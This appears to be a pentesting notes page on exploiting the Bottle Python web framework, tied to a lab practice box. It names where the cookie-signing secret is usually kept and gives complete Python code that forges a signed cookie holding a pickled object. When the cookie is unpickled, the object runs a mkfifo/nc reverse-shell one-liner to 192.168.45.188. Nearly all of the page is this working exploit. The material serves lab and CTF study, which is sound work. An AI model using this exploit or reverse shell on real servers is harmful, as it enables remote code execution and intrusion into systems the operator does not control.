Bottle Framework

Exploiting the bottle framework

Bottle is a fast, simple and lightweight WSGI micro web-framework for Python.

GitHub - bottlepy/bottle: bottle.py is a fast and simple micro-framework for python web-applications.GitHub

Good write up here:

NoRelect | Bottle Poemwww.norelect.ch

In bottle, the cookies are signed with a secret key. By default is is found at /app/config/secret.py

Complete code for generating cookie from the above link. Encyption may not be md5, could be sha256, or sha1

import os, hmac, hashlib, base64, pickle

def tob(s, enc='utf8'):
    if isinstance(s, str):
        return s.encode(enc)
    return b'' if s is None else bytes(s)

def touni(s, enc='utf8', err='strict'):
    if isinstance(s, bytes):
        return s.decode(enc, err)
    return str("" if s is None else s)

def create_cookie(name, value, secret):
    encoded = base64.b64encode(pickle.dumps([name, value], -1))
    sig = base64.b64encode(hmac.new(tob(secret), encoded, digestmod=hashlib.md5).digest())
    value = touni(tob('!') + sig + tob('?') + encoded)
    return value
# ...
class PickleRCE(object):
    def __reduce__(self):
        return (exec,("""
from bottle import response
import subprocess,base64
output = subprocess.check_output('rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|sh -i 2>&1|nc 192.168.45.188 80 >/tmp/f', shell=True)
response.set_header('X-Flag',base64.b64encode(output))
""",))
# ...

session = {"name": PickleRCE()}
print(create_cookie("name", session, "SECRET_KEY"))

Practice boxes

Proving grounds - bottleup

PreviousBooked NextCS-CART

Last updated 2 years ago

hashtagPopping a rev shell through a cookie 🍪

hashtagPractice boxes

Popping a rev shell through a cookie 🍪

Practice boxes